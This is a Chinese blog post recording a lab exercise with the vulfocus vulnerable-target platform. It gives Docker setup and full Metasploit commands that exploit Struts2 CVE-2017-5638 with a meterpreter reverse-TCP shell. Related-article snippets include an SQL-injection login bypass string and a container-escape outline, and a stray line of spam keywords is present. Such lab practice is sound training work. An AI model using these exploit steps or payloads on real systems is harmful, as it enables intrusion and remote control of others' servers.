<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    開源漏洞靶場vulfocus的實踐(一)

    VSole2021-10-31 13:36:42

    本周末實踐的是開源漏洞靶場vulfocus,真是簡單易用,以下是實踐記錄,

    搞個ubuntu18.04的虛擬機,安裝docker,

    sudo apt install docker.io,

    sudo systemctl enable docker,

    sudo gpasswd -a ubuntu docker,

    newgrp docker,

    下載vulfocus容器鏡像,docker pull vulfocus/vulfocus:latest,

    啟動vulfocus容器實例,

    docker run -d -p 8001:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=10.90.11.162 vulfocus/vulfocus,

    這就可以訪問vulfocus的管理界面了,http://10.90.11.162:8001,

    admin/admin,登錄進去,首先看鏡像管理,開始是空的,點擊一鍵同步,就都出來了,

    我習慣用cve-2017-5638做實驗,搜一下看有沒有,

    搜出來的可以點擊下載,就自動導入了,也可以手動導入本地的鏡像,因為我拿vulfocus自帶的cve-2017-5638鏡像做攻擊驗證沒成功,就又自己手動導入的piesecurity/apache-struts2-cve-2017-5638,

    導入鏡像成功后,主頁上就能看到并可以啟動了,

    本地安裝個metasploit,進行攻擊實驗,

    msfconsole,

    use exploit/multi/http/struts2_content_type_ognl,

    set RHOST 10.90.11.162,

    set RPORT 34351,

    set TARGETURI showcase.jsp,

    set LHOST 10.90.11.162,

    set payload linux/x64/meterpreter/reverse_tcp,

    exploit,

    這里需要特別注意的是,需要自己手動docker ps看一下靶機的映射端口,

    并通過set RPORT進行配置,攻擊成功了就是下面這樣,

    漏洞docker
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    0x01 工具介紹收集個人自接觸滲透測試用于漏洞驗證的所有熱門 cve、poc 攻擊和有效和殺傷部分工具,包括:POC+小工具+掃描器+CVE+Jar包+RCE0x02 安裝與使用1、驗證地址Vulfocus、Vulhub、漏洞docker、Vultarget、ByteCTF、攻防世界等
    但JBoss核心服務不包括支持servlet/JSP的WEB容器,一般與Tomcat或Jetty綁定使用。在J2EE應用服務器領域,JBoss是發展最為迅速的應用服務器。
    干貨|最全的Jboss漏洞復現筆記
    JBoss是一個基于J2EE的開放源代碼應用服務器,代碼遵循LGPL許可,可以在任何商業應用中免費使用;JBoss也是一個管理EJB的容器和服務器,支持EJB 1.1、EJB 2.0和EJB3規范。但JBoss核心服務不包括支持servlet/JSP的WEB容器,一般與Tomcat或Jetty綁定使用。在J2EE應用服務器領域,JBoss是發展最為迅速的應用服務器。由于JBoss遵循商業友好的LG
    fastjson.jar是阿里開發的一款專門用于Java開發的包,可以方便的實現json對象與JavaBean對象的轉換,實現JavaBean對象與json字符串的轉換,實現json對象與json字符串的轉換。除了這個fastjson以外,還有Google開發的Gson包,其他形式的如net.sf.json包,都可以實現json的轉換。方法名稱不同而已,最后的實現結果都是一樣的。
    騰訊安全云鼎實驗室持續監控云原生在野攻擊威脅態勢,繼DockerHub發現百萬下載量黑產鏡像(詳見文章 DockerHub再現百萬下載量黑產鏡像,小心你的容器被挖礦)之后,近期實驗室最新捕獲到TeamTNT黑客團隊新型在野容器攻擊活動,相比之前TeamTNT挖礦木馬,此次新型攻擊手法對原挖礦木馬進行了升級,并利用容器環境進行感染傳播。
    由于測試過程中很多系統我們能接觸到的只有一個登陸界面,所以要充分挖掘漏洞,進行深入操作登錄 注冊萬能密碼繞過登錄存在 SQL 注入的情況下,有可能使用萬能密碼直接登錄admin' or '1'='1'--. 有超級多登錄口 SQL 注入存在 SQL 注入的話直接注出賬密有些可以構造用戶注入登錄,比如熊海 cms 后臺登錄處存在 sql 注入$login=$_POST['login'];
    2020年12月01日,阿里云應急響應中心監測到 containerd 官方發布安全更新,修復了 Docker 容器逃逸漏洞漏洞描述 Containerd 是一個控制 runC 的守護進程,提供命令行客戶端和 API,用于在一個機器上管理容器。在特定網絡條件下,攻擊者可通過訪問containerd-shim API,從而實現Docker容器逃逸。阿里云應急響應中心提醒 containerd 用戶盡快采取安全措施阻止漏洞攻擊。影響版本 containerd < containerd < 安全版本 containerd >= containerd >= 安全建議 1. 升級 containerd 至最新版本。
    比如目標文件是/bin/bash,將它替換成指定解釋器路徑為#!/proc/self/exe的可執行腳本,在容器中執行/bin/bash時將執行/proc/self/exe,它指向host上的runC文件。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类